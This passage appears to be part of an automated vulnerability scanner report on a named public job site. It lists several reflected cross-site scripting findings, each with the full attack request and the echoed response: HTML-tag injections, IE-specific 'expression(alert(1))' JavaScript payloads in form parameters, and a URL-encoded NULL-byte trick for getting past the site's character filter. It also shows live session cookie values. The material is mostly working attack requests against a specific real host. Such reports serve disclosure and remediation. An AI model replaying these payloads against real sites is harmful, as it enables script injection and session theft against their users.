PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;securitysys=on&amp;formid=47&amp;rand=340991c93e5"><a>3041bdbfc36&amp;choice=1">
...[SNIP]...

3.148. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0050736"><a>f99e3e72883 was submitted in the rand parameter. This input was echoed as 50736"><a>f99e3e72883 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902%0050736"><a>f99e3e72883 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 499

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;formid=10&amp;rand=344110%0050736"><a>f99e3e72883&amp;choice=1">
...[SNIP]...

3.149. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728 was submitted in the securitysys parameter. This input was echoed as 742ad"style="x:expression(alert(1))"4cd993a311c127728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:19 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="SECURITYSYS_prev" value="on,on,on742ad"style="x:expression(alert(1))"4cd993a311c127728" />
...[SNIP]...

3.150. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [securitysys parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad65"><a>dc07e9b7fc6 was submitted in the securitysys parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on9ad65"><a>dc07e9b7fc6&FormID=10&rand=1902 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 499

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on9ad65"><a>dc07e9b7fc6&amp;formid=10&amp;rand=579601&amp;choice=1">
...[SNIP]...

3.151. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [submit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c951"style%3d"x%3aexpression(alert(1))"e4006df13c4 was submitted in the submit parameter. This input was echoed as 5c951"style="x:expression(alert(1))"e4006df13c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue5c951"style%3d"x%3aexpression(alert(1))"e4006df13c4&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:24'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="submit_error" value="Continue5c951"style="x:expression(alert(1))"e4006df13c4" class="cfTransparent" />
...[SNIP]...

3.152. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the usvuserid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478b6"style%3d"x%3aexpression(alert(1))"8a8c443b318 was submitted in the usvuserid parameter. This input was echoed as 478b6"style="x:expression(alert(1))"8a8c443b318 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=478b6"style%3d"x%3aexpression(alert(1))"8a8c443b318&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:09 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:09'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="usvuserid_error" value="478b6"style="x:expression(alert(1))"8a8c443b318" class="cfTransparent" />
...[SNIP]...

3.153. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [usvuserid_ADAdefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the usvuserid_ADAdefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c2"style%3d"x%3aexpression(alert(1))"c7cc97eb8fb was submitted in the usvuserid_ADAdefault parameter. This input was echoed as d82c2"style="x:expression(alert(1))"c7cc97eb8fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=d82c2"style%3d"x%3aexpression(alert(1))"c7cc97eb8fb&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxext
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:13 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:13'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="usvuserid_adadefault_error" value="d82c2"style="x:expression(alert(1))"c7cc97eb8fb" class="cfTransparent" />
...[SNIP]...

3.154. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5572d"><a>89daaddf139 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ada/mn_quicksearch_dsp.cfm?type=e5572d"><a>89daaddf139&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:13:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
